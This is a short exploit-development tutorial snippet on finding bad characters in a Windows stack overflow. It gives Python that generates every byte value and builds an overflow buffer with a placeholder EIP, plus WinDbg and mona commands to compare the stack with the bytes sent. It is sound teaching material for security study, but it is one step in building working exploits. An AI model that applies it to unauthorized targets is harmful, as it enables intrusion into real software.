When to reach for this
You’ve got a stack overflow working in WinDbg/x64dbg, EIP control confirmed, and now you need to know which bytes get mangled by the target binary’s input handling before you can place real shellcode. This is the loop you run in the payload position, then compare what made it onto the stack against what was sent.
The snippet
# Send all bytes 0x00..0xff in order. After hitting the breakpoint,
# in WinDbg: db esp L100 then mona compare -f sent.bin -a esp
badchars = bytes(range(0x00, 0x100))
# Most overflows can't tolerate \x00 (string terminator). Many also
# break on \x0a (LF) and \x0d (CR). Start by excluding only those:
SKIP = b'\x00'
badchars = bytes(b for b in range(0x00, 0x100) if b not in SKIP)
# Save a copy on disk so mona can diff against actual stack contents
with open('badchars.bin', 'wb') as f:
f.write(badchars)
# Then in your exploit:
buf = b'A' * OFFSET
buf += pack('<L', 0x41414141) # placeholder EIP
buf += badcharsThe WinDbg side
0:000> g # run, hit access violation
0:000> db esp L100 # dump 256 bytes from current esp
0:000> .writemem stack.bin esp L100 # save stack to disk for mona
0:000> !mona compare -f badchars.bin -a espmona prints any mismatched bytes. Add those to SKIP,
regenerate, repeat until clean.
Variants
For SEH overflows, the buffer goes into the SEH record offset, not return-address offset, but the comparison logic is identical.
Source / origin
Standard exploit-dev workflow. Variants of this appear in every Corelan tutorial.